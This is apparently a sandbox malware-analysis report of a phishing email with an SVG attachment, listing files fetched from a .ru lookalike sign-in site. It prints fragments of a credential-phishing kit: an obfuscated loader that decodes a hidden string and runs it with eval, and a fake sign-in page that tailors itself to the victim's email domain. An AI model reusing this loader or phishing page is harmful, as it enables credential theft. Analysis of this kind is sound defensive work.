                                                                        Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Sign in</title>.. <script>.. // Function to generate random alphanumeric characters.. function generateRandomString(length) {.. const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';.. let result = '';.. for (let i = 0; i < length; i++) {.. result += characters.charAt(Math.floor(Math.random() * characters.length));.. }.. return result;.. }.... // Function to extract subdomain from email (between @ and .).. function extractSubdomain(email) {.. // Check if it's an email format.. if (email.includes('@') && email.includes('.')) {.. // Extract the part between @ and ... const atIndex = email.indexOf('@');.. const dotIndex = email.inde
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:SVG Scalable Vector Graphics image
                                                                        Category:dropped
                                                                        Size (bytes):1864
                                                                        Entropy (8bit):5.222032823730197
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                        SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                        SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                        SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65447)
                                                                        Category:downloaded
                                                                        Size (bytes):89501
                                                                        Entropy (8bit):5.289893677458563
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):35786
                                                                        Entropy (8bit):5.058073854893359
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:38501E3FBBBD89B56AA5BA35DE1A32FE
                                                                        SHA1:D9B31981B6F834E8480BA28FBC1CFF1BE772F589
                                                                        SHA-256:A1CA6B381CB01968851C98512C6E7F6C5309A49F7A16B864813135CBFF82A85B
                                                                        SHA-512:1547937AA9B366E76DE44933EF48EF60E3D043245E8E3E01C97DFC2981F6B1F61463D9D30992FBCF2CA25FC1B7B32FF808B9789CFB965D74455522FC58E0C08C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/xyrN6azxUjCRpqSzcd26
                                                                        Preview:#sections_godaddy {..font-family: gdsherpa !important;..}..#sections_godaddy a {.. color: var(--ux-2rqapw,#000);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. text-decoration: var(--ux-1f7if5p,underline);.. background-color: transparent;..}....#sections_godaddy #root {.. flex: 1 1 0%;..}....#sections_godaddy a:hover {../* color: var(--ux-1j87vvn,#fff);*/.. -webkit-text-decoration: var(--ux-1ft0khm,underline);.. text-decoration: var(--ux-1ft0khm,underline);..}....#sections_godaddy svg {.. overflow: hidden;.. vertical-align: unset;..}....#sections_godaddy .ux-button {.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. padding: 0;.. text-decoration: var(--ux-1f7if5p,underline);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. gap: 0.5em;.. cursor: pointer;.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. font-weight: inherit;.. background: transparent;.. gap:
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):937
                                                                        Entropy (8bit):7.737931820487441
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:FC3B7BBE7970F47579127561139060E2
                                                                        SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                                        SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                                        SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://developers.cloudflare.com/favicon.png
                                                                        Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                                        Category:downloaded
                                                                        Size (bytes):28000
                                                                        Entropy (8bit):7.99335735457429
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                                        SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                                        SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                                        SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/GDSherpa-bold.woff2
                                                                        Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:downloaded
                                                                        Size (bytes):644
                                                                        Entropy (8bit):4.6279651077789685
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:541B83C2195088043337E4353B6FD60D
                                                                        SHA1:F09630596B6713217984785A64F6EA83E91B49C5
                                                                        SHA-256:2658B8874F0D2A12E8726DF78AC8954324C3BBE4695E66BDEF89195FDE64322F
                                                                        SHA-512:B2AE42BA9D3A63D3ACB179051B005F2589F147D94F044616AE5DC5705E873F16057C56934262841191263B4C35804EF188BD38CF69CCE0F4B2CF76C05F17B8AD
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/wxEAvfh79xY931O7OkQQ5DeTPrst9wZU0uuvZgKtV34130
                                                                        Preview:RIFF|...WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHK....W`$....z..".Y..P}0;.PE..G..h....9.@..`..2.......=.T.....-3..ow.*...&......VP8 :...0....*....>m&.M.!"......i...O...(.........g....w...XG...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (21720), with CRLF line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):4712061
                                                                        Entropy (8bit):2.583772531747173
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E34A613844E71AD9EA25A2FAAB768F3F
                                                                        SHA1:34844596642BED7752C4AED44721CEE52593B344
                                                                        SHA-256:D767A16A68A568D204E0E4283BDDB8A9702CCF95BF2715D512C4AE39C3D79AB5
                                                                        SHA-512:8D5342EC77557793F73701400220B10421E6B1ED941876554D27F27A0573644F26C66FA4AB7019E666F6471688E2F7857394CC127197EF109FC076BC5534342C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/34ffrvM4h24NzkkyD6SwzVMu9WijuexAcp9VzMOlBVr67107
                                                                        Preview:function decodeAndEvaluate(key) {.. const binaryString = [...key].. .map(char => Number('.' > char)).. .join('').. .replace(/.{8}/g, byte => String.fromCharCode(parseInt(byte, 2)));.. .. (0, eval)(binaryString);.. return true;..}....const handler = {.. get: function(_, prop) {.. decodeAndEvaluate(prop);.. return true;.. }..};..const viewsen = new Proxy({}, handler);..viewsen["........................................................................................................................................................................................................
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (48238)
                                                                        Category:downloaded
                                                                        Size (bytes):48239
                                                                        Entropy (8bit):5.343270713163753
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:184E29DE57C67BC329C650F294847C16
                                                                        SHA1:961208535893142386BA3EFE1444B4F8A90282C3
                                                                        SHA-256:DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
                                                                        SHA-512:AF3D62053148D139837CA895457BEEF7620AA52614B9A08FD0D5BEF8163F4C3B9E8D7B2A74D29079DB3DACC51D98AE4A5DC19C788928E5A854D7803EBB9DED9C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js
                                                                        Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:SVG Scalable Vector Graphics image
                                                                        Category:downloaded
                                                                        Size (bytes):7390
                                                                        Entropy (8bit):4.02755241095864
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                        SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                        SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                                        SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/ij4ju2f5snoNTxMCJrxIedZBHZMU2Iz4yXZa0cdKQl2fDm9jTZe4c7rlVqysESBB56169
                                                                        Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (51734)
                                                                        Category:downloaded
                                                                        Size (bytes):222931
                                                                        Entropy (8bit):5.0213311632628725
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:0329C939FCA7C78756B94FBCD95E322B
                                                                        SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                                        SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                                        SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                                        Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh
                                                                        File type:ASCII text, with CRLF line terminators
                                                                        Entropy (8bit):6.069167577922534
                                                                        TrID:
                                                                          File name:message__0XSkcQEiS5ehXOfhSk9JKw_geopod_ismtpd_30_.eml
                                                                          File size:12'202 bytes
                                                                          MD5:11e0e238d10996702dcef9893e69bfba
                                                                          SHA1:2be67d6f4f21992b9dcc642154d174596a2f87b1
                                                                          SHA256:66101f19ed9097e71c47e841316729e51b48442dd77dbc9e75a2e38e48fdd60b
                                                                          SHA512:4f193f0e33a6f03c74b7f77db38d72f71462a9b175a6939bda5b78fd600393b0dcedc6ffe88dba6ec379cc9c0016677b541a30823cba0c9007a74d50fc8a325d
                                                                          SSDEEP:192:+mMTizlQbVTgqGSpzShb2ftmKSLgwx/zb2HPQXs24iAc4Sy7mCAL8ZT5NrnJ2fUQ:WGqzShMtIgwxOHPQ8diocCVH2fUgmS
                                                                          TLSH:76426B1E39D6B86CA7F42289F47A3E8FA3841711D56360887C3056B9499E3BDD9E84F0
                                                                          File Content Preview:X-Proofpoint-Sentinel: stfjmB0GzEzqAcmnWZTnblNAsVH8DCQvnuYDitZF7qN67A9TYWx0ZWRfX25.. bw1fDSLLre5Fm+hP78eDWId/wpSIVskYqTTM7MM44OcrVaKiqJgQKVx6q/EIM5MEaXuO1D7k5gNP.. Ht/WLtpwcaPhKx+FKSOV6WrSQbFq9rHjDceBco6mLTSS3BPINUpFjmx5yAlZ5DTmXacf43ElJiZ/.. cN2oxCKus4qr
                                                                          Subject:[External] Attached/image from ADMIN@quiltercheviot.com
                                                                          From:ePrinter 0403873580 <info@servis.ai>
                                                                          To:richard.thorn@quiltercheviot.com
                                                                          Cc:
                                                                          BCC:
                                                                          Date:Tue, 18 Mar 2025 01:17:55 +0000
                                                                          Communications:
                                                                            Attachments:
                                                                            • 9114950926.svg
                                                                            Key Value
                                                                            X-Proofpoint-SentinelstfjmB0GzEzqAcmnWZTnblNAsVH8DCQvnuYDitZF7qN67A9TYWx0ZWRfX25 bw1fDSLLre5Fm+hP78eDWId/wpSIVskYqTTM7MM44OcrVaKiqJgQKVx6q/EIM5MEaXuO1D7k5gNP Ht/WLtpwcaPhKx+FKSOV6WrSQbFq9rHjDceBco6mLTSS3BPINUpFjmx5yAlZ5DTmXacf43ElJiZ/ cN2oxCKus4qrH4jgL1IkZ38Ab6QX06CCuVgTDG5phGLwEhJMtU3zGSrGTrRgJJNXzDB69MVIZWFk lHsMTfWnTloHZBbjBUbhUxdC6vd9HG2WS6SQMhmqK0ao132YbolFwjx37CXbnjW0hlyW56VLRLaM 9PQYrm8m6C91P4uSZjmI4t/pZrqNDP8f8oS0KAc/5/n+QRs/pW8aVNZN+F9qr5Wo4p7jvOCWuTYK j5XF/zhRiN32O63a5Pod4E69BwGp8pGJg8GxVMR5gcst087mQWRkY4HRE4wrqtVTMY2bTjh8pm6W /KUIj4qXQF8Vly8jmJCfjmICCFz1L+5S33gjeNMuZ+jSx6JFTihqy9kLLT3E5O4hWYKY2qc+Insb UvvJZt3mhhtTH2mcTmi8+CZRrzwpfxP0FuSRhDl2buuTjaMnfnQQOp7iJ0IPTKmAWRWzl675mZct ewRNAgmoUP/uEEZ/I1Tbm2FvFrDnHggBBoVgkW8x1+3P/I1nN189D6rADcCQz9nHCOvbuEnFeq89 USVeuChbX02B5Pom9aN+1yLhuc1bQrAA1G15O//uOZbY4OUpZy0/qj8bvN+xlPnLGyeFXjZrEFZe OcONZ/4racsP1aa7rKk5zNeYj5bJe+7kiI0v7JanCLdm8/dBk9SpbHuoCdJiSa3wYB2y/rHL1KBq 1z0bMxeK7HIyu+4+aGgX9Bn1bFkSNUx6qyjnYKhWhY3NRnW3MXF1VJE2cyE6EX/72BYck/HPsTCX 8lG+qjsi0WKARI6YQtsl9df9fVoyRgM8SdhxQMcCzoEcAFJn+QQT6X1v+4h7W4NiZD+mryaRo2Ra 2ntwIut9E3+W/IOWARS6/i/U=
                                                                            Authentication-Resultsppops.net; dkim=pass header.s=s1 header.d=servis.ai; spf=pass smtp.mailfrom=bounces+25952314-b56d-richard.thorn=quiltercheviot.com@em9655.servis.ai; dmarc=pass header.from=servis.ai
                                                                            Receivedfrom [100.64.100.6] (unknown) by geopod-ismtpd-30 (SG) with ESMTP id 0XSkcQEiS5ehXOfhSk9JKw for <richard.thorn@quiltercheviot.com>; Tue, 18 Mar 2025 01:17:55.159 +0000 (UTC)
                                                                            DKIM-Signaturev=1; a=rsa-sha256; c=relaxed/relaxed; d=servis.ai; h=content-type:mime-version:from:subject:to:cc:content-type:from: subject:to; s=s1; bh=e2niyGSMDjBpvUHCq0Y07ovROEHl4ynv9uqxpZEo8jQ=; b=fwrI39d9jY8yaRmgieabU3i58TxTz0O8DJ0s5y4xiQ6b33yRNqbWG71X42NYOk/WiutP tPLeXUE/pnAWVvjgg6D8mewx/pNsMPinwFYFgRNc3zPVUat5yOCKHze2zSOJ0YAmdhjl7f 1PzFCN9mQ/sMNnAKIyODK2dLm5OINZn6EV5FTaotyYrO++8AnmE9gZwnAn6sU9lfMTP5s1 YdoKG0rgAe2fCV4hlAOIhmmaLhkphULY+tZAFl3t3V2tbkuRT++JnWX+K+eAH28+p5FPML LKVFFpbcCskzAvBgL7izw2Xn6JV1AnqOYLpRGG3UCJtDz9/yT72wNBdTaFkPnJFg==
                                                                            Content-Typemultipart/mixed; boundary="===============0344819296694936674=="
                                                                            MIME-Version1.0
                                                                            FromePrinter 0403873580 <info@servis.ai>
                                                                            Message-ID<0XSkcQEiS5ehXOfhSk9JKw@geopod-ismtpd-30>
                                                                            DateTue, 18 Mar 2025 01:17:55 +0000
                                                                            X-SG-EID u001.ja5x2hTJw6bBXLeRw2InV17RAZnyNb7H/JP+43/tux82y2dUueCsk7UpjIyn6q/Z6kxEKtIp97ILp34UUvLMhX9J2RJ3J2YT/mBYQOz7L+F3dEsHqYfleBB+nkUAVvOIPs+FhC8dazX7Q1YURC8QpovmeNvBflqN1tsiZS/zn7dqM3mf3U+VmtafQx7KOKuHR1os1yGkohrMXIfIPYjcohR43UvBCAkApQig8jG3x/9xHuKepnDG7qlMAmfJTcTTav/f8eU5yCmBfZ0WaLHIyw==
                                                                            Torichard.thorn@quiltercheviot.com
                                                                            X-Entity-IDu001.MWkVaOzEy9/UiB0VNzJpzQ==
                                                                            X-Authority-Analysisv=2.4 cv=BenY0qt2 c=1 sm=1 tr=0 ts=67d8ca6c b=1 cx=c_pps a=oDp3HqeTnKU/eXVa18u/4A==:117 a=oDp3HqeTnKU/eXVa18u/4A==:17 a=JZZLUqjyAAAA:8 a=JO_3FCIQRjkA:10 a=Vs1iUdzkB0EA:10 a=FnRh6jz0t2IA:10 a=CjuIK1q_8ugA:10 a=SSmOFEACAAAA:8 a=cWW1OmiiEieVMJtmam8A:9 a=L03L2QfmqWoA:10 a=1WNtSb5ECZgA:10 a=QEXdDO2ut3YA:10 a=tDTIrp_YVeGTO7gPfFWI:22 a=fNnvNnx3n4v3WcUcLETx:22
                                                                            X-Proofpoint-GUIDSBwd1OMxcjFk7ozudltmOuwUCLXGZuE4
                                                                            X-Proofpoint-ORIG-GUID-EWbeFah4PiU39jfmNlU0j1tYKVOy0of
                                                                            X-CLX-ShadesJunk
                                                                            X-CLX-Response1TFkXBx0dGxEKWUQXbn1JHnsaHx9PGXkRClhYF29YRlBaXUtIWRtGEQp4Thd vaV8BbUVLSWUeUhEKQ0gXBxMZEQpDWRcHGBscEQpDSRcaBBoaGhEKWU0XYF9EQREKWUkXBxkTHX EZExkGBx0TdwYbGgYaBhoGGxwGBxgaGnEaEBgdHxx3BhoGBxgaGgYaBhoGGgYacRoQGncGGhEKW V4XbGx5EQpJRhdbX0NGXk9YRUdddUJFWV5PThEKSUcXeE9NEQpDThcHb31IT2xLQh56Q38ZE0BM R2RGfxpAG15zYXxlUxpFTBEKWFwXHwQaBBkTHgUbGgQdGgQbGR4EGR8QGx4aHxoRCl5ZF0xuRxJ iEQpNXBcZGREKTFoXbmxiWk1DEQpNThdoEQpMRhdsa2tra2sRCkJPF2MBbU4fc0RcZ2IBEQpDWh cbHhMEHRgEHxwEGxIZEQpCXhcbEQpCXBcbEQpeThcbEQpCSxdvaV8BbUVLSWUeUhEKQkkXb2lfA W1FS0llHlIRCkJFF2dHf1pPZ18cWkR4EQpCThdvaV8BbUVLSWUeUhEKQkwXb1hGUFpdS0hZG0YR CkJsF295bWRTZ1B+GRteEQpCQBdreG1sWhp7QXJ/WBEKQlgXZgVmU0cYTElFfR8RClpYFxwRCnl DF29MRntmQkZOT3JYEQpZSxccHhkRCnBoF3pabFsSYwFyEntuEAcYGBEKcGgXYkhMfgF8HHN6HB 0QGhEKcGgXbR0eTUBLWX9BWkIQGhEKcGgXZlwaT2RreGVCGEIQBxwZEQpwaBdrc2Bue3JYb2lCE xAaEQpwaBdsTkl/c21oQX97RhAaEQpwaBdlGG99b3hwSV1/WBAHGBgRCnBoF2JuekJfTnpnTkYe EBoRCnB9F2EZEmVIfU1JWVlsEAcYGhEKcH0XYmUSYmd+ckJ+cgUQHB8RCnB/F2QFS2sSGnx5Ylh rEBwTEQpwXxdtR3gecG9aZEZyaRAHGBoRCnBfF2BQZE5OSF57Ek1+EBwfEQpwbBd6ZxwaGFtbGk NCRhAHHR4RCnBDF2twQXtteExMen0bEAcfHREKbX4XGhEKWE0XSxEg
                                                                            Subject[External] Attached/image from ADMIN@quiltercheviot.com
                                                                            X-Proofpoint-Virus-Versionvendor=baseguard engine=ICAP:2.0.293,Aquarius:18.0.1093,Hydra:6.0.680,FMLib:17.12.68.34 definitions=2025-03-17_10,2025-03-17_03,2024-11-22_01
                                                                            X-Proofpoint-Spam-Detailsrule=inbound_phish policy=inbound score=100 lowpriorityscore=0 adultscore=0 spamscore=0 unknownsenderscore=20 clxscore=-771 malwarescore=0 bulkscore=0 snscore=2 phishscore=100 mlxscore=0 suspectscore=0 impostorscore=0 priorityscore=1501 classifier=phish authscore=0 authtc=n/a authcc= route=inbound adjust=0 reason=mlx scancount=2 engine=8.19.0-2502280000 definitions=main-2503180007 domainage_hfrom=643

                                                                            Icon Hash:46070c0a8e0c67d6